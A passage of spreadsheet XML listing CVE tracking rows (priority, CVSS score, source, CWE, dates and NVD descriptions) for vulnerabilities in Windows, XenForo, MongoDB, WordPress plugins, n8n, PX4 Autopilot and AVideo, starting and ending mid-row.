t="inlineStr" /><c r="M862" s="5" t="inlineStr" /><c r="N862" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O862" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P862" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q862" s="5" t="inlineStr" /><c r="R862" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S862" s="5" t="inlineStr"><is><t>Use after free in Windows TCP/IP allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T862" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69761</t></is></c></row><row r="863"><c r="A863" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B863" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C863" s="5" t="inlineStr"><is><t>CVE-2026-69775</t></is></c><c r="D863" s="5" t="n"><v>7.1</v></c><c r="E863" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F863" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G863" s="5" t="inlineStr" /><c r="H863" s="5" t="n"><v>0.005</v></c><c r="I863" s="5" t="inlineStr" /><c r="J863" s="5" t="inlineStr" /><c r="K863" s="5" t="inlineStr" /><c r="L863" s="5" t="inlineStr" /><c r="M863" s="5" t="inlineStr" /><c r="N863" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O863" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P863" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q863" s="5" t="inlineStr" /><c r="R863" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S863" s="5" t="inlineStr"><is><t>Use after free in Windows DWM Core Library allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T863" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69775</t></is></c></row><row r="864"><c r="A864" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B864" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C864" s="5" t="inlineStr"><is><t>CVE-2026-73321</t></is></c><c r="D864" s="5" t="n"><v>7.1</v></c><c r="E864" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F864" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G864" s="5" t="inlineStr" /><c r="H864" s="5" t="n"><v>0.004</v></c><c r="I864" s="5" t="inlineStr" /><c r="J864" s="5" t="inlineStr" /><c r="K864" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L864" s="5" t="inlineStr" /><c r="M864" s="5" t="inlineStr" /><c r="N864" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O864" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P864" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q864" s="5" t="inlineStr" /><c r="R864" s="5" t="inlineStr"><is><t>CWE-674</t></is></c><c r="S864" s="5" t="inlineStr"><is><t>XenForo before 2.3.13 contains an uncontrolled recursion vulnerability in the BBCode parser that allows authenticated attackers to cause persistent denial of service by submitting a post with deeply nested BBCode tags. Attackers can craft a single malicious post with sufficient nesting depth to exceed PHP's stack limit, causing fatal errors that repeatedly terminate PHP-FPM workers for all visitors rendering the affected thread.</t></is></c><c r="T864" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73321</t></is></c></row><row r="865"><c r="A865" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B865" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C865" s="5" t="inlineStr"><is><t>CVE-2026-81781</t></is></c><c r="D865" s="5" t="n"><v>7.1</v></c><c r="E865" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F865" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G865" s="5" t="inlineStr" /><c r="H865" s="5" t="n"><v>0.002</v></c><c r="I865" s="5" t="inlineStr" /><c r="J865" s="5" t="inlineStr" /><c r="K865" s="5" t="inlineStr" /><c r="L865" s="5" t="inlineStr" /><c r="M865" s="5" t="inlineStr" /><c r="N865" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O865" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P865" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q865" s="5" t="inlineStr" /><c r="R865" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S865" s="5" t="inlineStr"><is><t>Missing Authorization vulnerability in Unbounce Unbounce Landing Pages unbounce allows Exploiting Incorrectly Configured Access Control Security Levels.

This issue affects Unbounce Landing Pages: from n/a through 1.1.4.</t></is></c><c r="T865" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81781</t></is></c></row><row r="866"><c r="A866" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B866" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C866" s="5" t="inlineStr"><is><t>CVE-2026-81798</t></is></c><c r="D866" s="5" t="n"><v>7.1</v></c><c r="E866" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F866" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G866" s="5" t="inlineStr" /><c r="H866" s="5" t="n"><v>0.001</v></c><c r="I866" s="5" t="inlineStr" /><c r="J866" s="5" t="inlineStr" /><c r="K866" s="5" t="inlineStr" /><c r="L866" s="5" t="inlineStr" /><c r="M866" s="5" t="inlineStr" /><c r="N866" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O866" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P866" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q866" s="5" t="inlineStr" /><c r="R866" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S866" s="5" t="inlineStr"><is><t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Easy Appointments allows DOM-Based XSS.

This issue affects Easy Appointments: from n/a through 4.0.2.1.</t></is></c><c r="T866" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81798</t></is></c></row><row r="867"><c r="A867" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B867" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C867" s="5" t="inlineStr"><is><t>CVE-2026-82052</t></is></c><c r="D867" s="5" t="n"><v>7.1</v></c><c r="E867" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F867" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G867" s="5" t="inlineStr" /><c r="H867" s="5" t="n"><v>0.004</v></c><c r="I867" s="5" t="inlineStr" /><c r="J867" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K867" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L867" s="5" t="inlineStr" /><c r="M867" s="5" t="inlineStr" /><c r="N867" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O867" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P867" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q867" s="5" t="inlineStr" /><c r="R867" s="5" t="inlineStr"><is><t>CWE-617</t></is></c><c r="S867" s="5" t="inlineStr"><is><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is></c><c r="T867" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82052</t></is></c></row><row r="868"><c r="A868" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B868" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C868" s="5" t="inlineStr"><is><t>CVE-2026-82054</t></is></c><c r="D868" s="5" t="n"><v>7.1</v></c><c r="E868" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F868" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G868" s="5" t="inlineStr" /><c r="H868" s="5" t="n"><v>0.003</v></c><c r="I868" s="5" t="inlineStr" /><c r="J868" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K868" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L868" s="5" t="inlineStr" /><c r="M868" s="5" t="inlineStr" /><c r="N868" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O868" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P868" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q868" s="5" t="inlineStr" /><c r="R868" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S868" s="5" t="inlineStr"><is><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is></c><c r="T868" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82054</t></is></c></row><row r="869"><c r="A869" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B869" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C869" s="5" t="inlineStr"><is><t>CVE-2026-82055</t></is></c><c r="D869" s="5" t="n"><v>7.1</v></c><c r="E869" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F869" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G869" s="5" t="inlineStr" /><c r="H869" s="5" t="n"><v>0.003</v></c><c r="I869" s="5" t="inlineStr" /><c r="J869" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K869" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L869" s="5" t="inlineStr" /><c r="M869" s="5" t="inlineStr" /><c r="N869" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O869" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P869" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q869" s="5" t="inlineStr" /><c r="R869" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S869" s="5" t="inlineStr"><is><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is></c><c r="T869" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82055</t></is></c></row><row r="870"><c r="A870" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B870" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C870" s="5" t="inlineStr"><is><t>CVE-2026-82057</t></is></c><c r="D870" s="5" t="n"><v>7.1</v></c><c r="E870" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F870" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G870" s="5" t="inlineStr" /><c r="H870" s="5" t="n"><v>0.003</v></c><c r="I870" s="5" t="inlineStr" /><c r="J870" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K870" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L870" s="5" t="inlineStr" /><c r="M870" s="5" t="inlineStr" /><c r="N870" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O870" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P870" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q870" s="5" t="inlineStr" /><c r="R870" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S870" s="5" t="inlineStr"><is><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is></c><c r="T870" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82057</t></is></c></row><row r="871"><c r="A871" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B871" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C871" s="5" t="inlineStr"><is><t>CVE-2026-82058</t></is></c><c r="D871" s="5" t="n"><v>7.1</v></c><c r="E871" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F871" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G871" s="5" t="inlineStr" /><c r="H871" s="5" t="n"><v>0.003</v></c><c r="I871" s="5" t="inlineStr" /><c r="J871" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K871" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L871" s="5" t="inlineStr" /><c r="M871" s="5" t="inlineStr" /><c r="N871" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O871" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P871" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q871" s="5" t="inlineStr" /><c r="R871" s="5" t="inlineStr"><is><t>CWE-248</t></is></c><c r="S871" s="5" t="inlineStr"><is><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is></c><c r="T871" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82058</t></is></c></row><row r="872"><c r="A872" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B872" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C872" s="5" t="inlineStr"><is><t>CVE-2026-82065</t></is></c><c r="D872" s="5" t="n"><v>7.1</v></c><c r="E872" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F872" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G872" s="5" t="inlineStr" /><c r="H872" s="5" t="n"><v>0.003</v></c><c r="I872" s="5" t="inlineStr" /><c r="J872" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K872" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L872" s="5" t="inlineStr" /><c r="M872" s="5" t="inlineStr" /><c r="N872" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O872" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P872" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q872" s="5" t="inlineStr" /><c r="R872" s="5" t="inlineStr"><is><t>CWE-617</t></is></c><c r="S872" s="5" t="inlineStr"><is><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is></c><c r="T872" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82065</t></is></c></row><row r="873"><c r="A873" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B873" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C873" s="5" t="inlineStr"><is><t>CVE-2026-82068</t></is></c><c r="D873" s="5" t="n"><v>7.1</v></c><c r="E873" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F873" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G873" s="5" t="inlineStr" /><c r="H873" s="5" t="n"><v>0.003</v></c><c r="I873" s="5" t="inlineStr" /><c r="J873" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K873" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L873" s="5" t="inlineStr" /><c r="M873" s="5" t="inlineStr" /><c r="N873" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O873" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P873" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q873" s="5" t="inlineStr" /><c r="R873" s="5" t="inlineStr"><is><t>CWE-617</t></is></c><c r="S873" s="5" t="inlineStr"><is><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is></c><c r="T873" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82068</t></is></c></row><row r="874"><c r="A874" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B874" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C874" s="5" t="inlineStr"><is><t>CVE-2026-82070</t></is></c><c r="D874" s="5" t="n"><v>7.1</v></c><c r="E874" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F874" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G874" s="5" t="inlineStr" /><c r="H874" s="5" t="n"><v>0.002</v></c><c r="I874" s="5" t="inlineStr" /><c r="J874" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K874" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L874" s="5" t="inlineStr" /><c r="M874" s="5" t="inlineStr" /><c r="N874" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O874" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P874" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q874" s="5" t="inlineStr" /><c r="R874" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="S874" s="5" t="inlineStr"><is><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is></c><c r="T874" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82070</t></is></c></row><row r="875"><c r="A875" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B875" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C875" s="5" t="inlineStr"><is><t>CVE-2026-82073</t></is></c><c r="D875" s="5" t="n"><v>7.1</v></c><c r="E875" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F875" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G875" s="5" t="inlineStr" /><c r="H875" s="5" t="n"><v>0.003</v></c><c r="I875" s="5" t="inlineStr" /><c r="J875" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K875" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L875" s="5" t="inlineStr" /><c r="M875" s="5" t="inlineStr" /><c r="N875" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O875" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P875" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q875" s="5" t="inlineStr" /><c r="R875" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S875" s="5" t="inlineStr"><is><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is></c><c r="T875" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82073</t></is></c></row><row r="876"><c r="A876" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B876" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C876" s="5" t="inlineStr"><is><t>CVE-2026-82074</t></is></c><c r="D876" s="5" t="n"><v>7.1</v></c><c r="E876" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F876" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G876" s="5" t="inlineStr" /><c r="H876" s="5" t="n"><v>0.002</v></c><c r="I876" s="5" t="inlineStr" /><c r="J876" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K876" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L876" s="5" t="inlineStr" /><c r="M876" s="5" t="inlineStr" /><c r="N876" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O876" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P876" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q876" s="5" t="inlineStr" /><c r="R876" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S876" s="5" t="inlineStr"><is><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is></c><c r="T876" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82074</t></is></c></row><row r="877"><c r="A877" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B877" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C877" s="5" t="inlineStr"><is><t>CVE-2026-82076</t></is></c><c r="D877" s="5" t="n"><v>7.1</v></c><c r="E877" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F877" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G877" s="5" t="inlineStr" /><c r="H877" s="5" t="n"><v>0.003</v></c><c r="I877" s="5" t="inlineStr" /><c r="J877" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K877" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L877" s="5" t="inlineStr" /><c r="M877" s="5" t="inlineStr" /><c r="N877" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O877" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P877" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q877" s="5" t="inlineStr" /><c r="R877" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S877" s="5" t="inlineStr"><is><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is></c><c r="T877" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82076</t></is></c></row><row r="878"><c r="A878" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B878" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C878" s="5" t="inlineStr"><is><t>CVE-2026-84817</t></is></c><c r="D878" s="5" t="n"><v>7.1</v></c><c r="E878" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F878" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G878" s="5" t="inlineStr" /><c r="H878" s="5" t="n"><v>0.001</v></c><c r="I878" s="5" t="inlineStr" /><c r="J878" s="5" t="inlineStr" /><c r="K878" s="5" t="inlineStr" /><c r="L878" s="5" t="inlineStr" /><c r="M878" s="5" t="inlineStr" /><c r="N878" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O878" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P878" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q878" s="5" t="inlineStr" /><c r="R878" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S878" s="5" t="inlineStr"><is><t>Unauthenticated Cross Site Scripting (XSS) in JetFormBuilder &lt;= 3.6.5.1 versions.</t></is></c><c r="T878" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84817</t></is></c></row><row r="879"><c r="A879" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B879" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C879" s="5" t="inlineStr"><is><t>CVE-2026-84818</t></is></c><c r="D879" s="5" t="n"><v>7.1</v></c><c r="E879" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F879" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G879" s="5" t="inlineStr" /><c r="H879" s="5" t="n"><v>0.001</v></c><c r="I879" s="5" t="inlineStr" /><c r="J879" s="5" t="inlineStr" /><c r="K879" s="5" t="inlineStr" /><c r="L879" s="5" t="inlineStr" /><c r="M879" s="5" t="inlineStr" /><c r="N879" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O879" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P879" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q879" s="5" t="inlineStr" /><c r="R879" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S879" s="5" t="inlineStr"><is><t>Unauthenticated Cross Site Scripting (XSS) in Open User Map &lt;= 1.4.50 versions.</t></is></c><c r="T879" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84818</t></is></c></row><row r="880"><c r="A880" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B880" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C880" s="5" t="inlineStr"><is><t>CVE-2026-84820</t></is></c><c r="D880" s="5" t="n"><v>7.1</v></c><c r="E880" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F880" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G880" s="5" t="inlineStr" /><c r="H880" s="5" t="n"><v>0.001</v></c><c r="I880" s="5" t="inlineStr" /><c r="J880" s="5" t="inlineStr" /><c r="K880" s="5" t="inlineStr" /><c r="L880" s="5" t="inlineStr" /><c r="M880" s="5" t="inlineStr" /><c r="N880" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O880" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P880" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q880" s="5" t="inlineStr" /><c r="R880" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S880" s="5" t="inlineStr"><is><t>Unauthenticated Cross Site Scripting (XSS) in Unlimited Elements For Elementor (Free Widgets, Addons, Templates) &lt;= 2.0.17 versions.</t></is></c><c r="T880" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84820</t></is></c></row><row r="881"><c r="A881" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B881" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C881" s="5" t="inlineStr"><is><t>CVE-2026-86074</t></is></c><c r="D881" s="5" t="n"><v>7.1</v></c><c r="E881" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F881" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G881" s="5" t="inlineStr" /><c r="H881" s="5" t="n"><v>0.003</v></c><c r="I881" s="5" t="inlineStr" /><c r="J881" s="5" t="inlineStr" /><c r="K881" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L881" s="5" t="inlineStr" /><c r="M881" s="5" t="inlineStr" /><c r="N881" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O881" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P881" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q881" s="5" t="inlineStr" /><c r="R881" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S881" s="5" t="inlineStr"><is><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is></c><c r="T881" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86074</t></is></c></row><row r="882"><c r="A882" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B882" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C882" s="5" t="inlineStr"><is><t>CVE-2026-86081</t></is></c><c r="D882" s="5" t="n"><v>7.1</v></c><c r="E882" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F882" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G882" s="5" t="inlineStr" /><c r="H882" s="5" t="n"><v>0.003</v></c><c r="I882" s="5" t="inlineStr" /><c r="J882" s="5" t="inlineStr" /><c r="K882" s="5" t="inlineStr" /><c r="L882" s="5" t="inlineStr" /><c r="M882" s="5" t="inlineStr" /><c r="N882" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O882" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P882" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q882" s="5" t="inlineStr" /><c r="R882" s="5" t="inlineStr"><is><t>CWE-1333</t></is></c><c r="S882" s="5" t="inlineStr"><is><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is></c><c r="T882" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86081</t></is></c></row><row r="883"><c r="A883" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B883" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C883" s="5" t="inlineStr"><is><t>CVE-2026-86713</t></is></c><c r="D883" s="5" t="n"><v>7.1</v></c><c r="E883" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F883" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G883" s="5" t="inlineStr" /><c r="H883" s="5" t="n"><v>0.004</v></c><c r="I883" s="5" t="inlineStr" /><c r="J883" s="5" t="inlineStr" /><c r="K883" s="5" t="inlineStr" /><c r="L883" s="5" t="inlineStr" /><c r="M883" s="5" t="inlineStr" /><c r="N883" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O883" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P883" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q883" s="5" t="inlineStr" /><c r="R883" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S883" s="5" t="inlineStr"><is><t>PX4 Autopilot through 1.17.0 contains a use-after-free vulnerability in the load_mon module's stop path where exit_and_cleanup() deletes the LoadMon object and frees the performance counter before perf_end() attempts to access it. Attackers can trigger this vulnerability by issuing the load_mon stop command from any PXH or MAVLink shell, causing reads and writes through freed memory that corrupt heap objects and destabilize the flight stack.</t></is></c><c r="T883" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86713</t></is></c></row><row r="884"><c r="A884" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B884" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C884" s="5" t="inlineStr"><is><t>CVE-2026-86718</t></is></c><c r="D884" s="5" t="n"><v>7.1</v></c><c r="E884" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F884" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G884" s="5" t="inlineStr" /><c r="H884" s="5" t="n"><v>0.002</v></c><c r="I884" s="5" t="inlineStr" /><c r="J884" s="5" t="inlineStr" /><c r="K884" s="5" t="inlineStr" /><c r="L884" s="5" t="inlineStr" /><c r="M884" s="5" t="inlineStr" /><c r="N884" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O884" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P884" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q884" s="5" t="inlineStr" /><c r="R884" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="S884" s="5" t="inlineStr"><is><t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a cross-site request forgery vulnerability in deleteHistory.json.php and finishAll.json.php that allows unauthenticated attackers to mutate live history by making GET requests without CSRF token validation. Attackers can craft malicious pages that trigger administrator browsers to delete all live transmission history or mark streams as finished when an admin visits the attacker-controlled site.</t></is></c><c r="T884" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86718</t></is></c></row><row r="885"><c r="A885" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B885" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C885" s="5" t="inlineStr"><is><t>CVE-2026-86724</t></is></c><c r="D885" s="5" t="n"><v>7.1</v></c><c r="E885" s="5" 